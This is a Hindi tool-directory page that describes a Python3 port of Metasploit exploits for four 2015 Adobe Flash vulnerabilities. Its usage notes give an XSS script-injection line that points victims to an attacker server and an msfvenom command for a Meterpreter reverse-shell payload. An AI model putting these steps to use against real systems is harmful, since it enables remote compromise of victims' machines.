Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Adobe-Flash-Exploits_17-18 — Adobe Flash की कमजोरियों CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit एक्सप्लॉइट्स को Python3 स्क्रिप्ट में परिवर्तित किया गया। | Kitploit
उपकरण/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Adobe Flash की कमजोरियों CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit एक्सप्लॉइट्स को Python3 स्क्रिप्ट में परिवर्तित किया गया।

रिपॉजिटरी देखें
165 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 Python3 स्क्रिप्ट

Adobe Flash भेद्यताओं CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit exploits को Python3 स्क्रिप्ट में परिवर्तित किया गया।

जानकारी

यह स्क्रिप्ट एक वेब सर्वर होस्ट करेगी जो एक बार में निम्नलिखित Adobe Flash भेद्यताओं में से एक का शोषण कर सकती है:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

निष्पादन

आपको अपनी आवश्यकताओं के अनुसार exploit.py में परिवर्तन करने होंगे (यहाँ रूपरेखा)।

संशोधन

  • hostname = "192.168.1.100"
    • यह हमलावर सिस्टम पर एक IP है जो शोषण वेब सर्वर को होस्ट करेगा।
  • serverPort = 8080
    • यह हमलावर सिस्टम पर पोर्ट है जो शोषण वेब सर्वर को होस्ट करेगा।
  • xss = False
    • यदि True पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध JavaScript के रूप में माना जाता है:
      • XSS इंजेक्ट का उदाहरण:
        • <script src="http://192.168.1.100:8080/"></script>
      • हमला पथ:
        • पीड़ित अनुरोध 1 -> XSS असुरक्षित सर्वर:
          • पीड़ित एक दूरस्थ सर्वर पर XSS इंजेक्ट तक पहुँचता है जो एक JavaScript फ़ाइल का अनुरोध करता है (अनुरोध 2 देखें)।
        • पीड़ित अनुरोध 2 -> हमलावर सिस्टम पर JavaScript स्रोत।
        • पीड़ित अनुरोध 3 -> दुर्भावनापूर्ण swf फ़ाइल।
    • यदि False पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध HTML के रूप में माना जाता है:
      • उदाहरण:
        • http://192.168.1.100:8080/
      • हमला पथ:
        • पीड़ित अनुरोध 1 -> हमलावर सिस्टम पर HTML फ़ाइल।
        • पीड़ित अनुरोध 2 -> दुर्भावनापूर्ण swf फ़ाइल।
  • base64Payload = "..."
    • यह base64 पेलोड है जो पीड़ित सिस्टम पर निष्पादित किया जाएगा।
    • अपनी आवश्यकताओं के अनुसार नीचे दिए गए उदाहरण कमांड को संशोधित करें और अपना पेलोड उत्पन्न करें:
      • उदाहरण:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • ध्यान दें: एकमात्र पेलोड जो मेरे लिए काम करता है वह windows/meterpreter/reverse_tcp है।

  • swfFile = swfFileList['37368']
    • पीड़ित सिस्टम का शोषण करने के लिए उपयोग करने हेतु Adobe Flash शोषण swf फ़ाइल चुनें:
      • swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

चलाएँ

दुर्भावनापूर्ण swf फ़ाइलों के समान निर्देशिका में, Adobe Flash शोषण स्क्रिप्ट को निष्पादित करने के लिए निम्नलिखित कमांड चलाएँ:

  • python3 exploit.py

संदर्भ:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

टूल डाउनलोड करें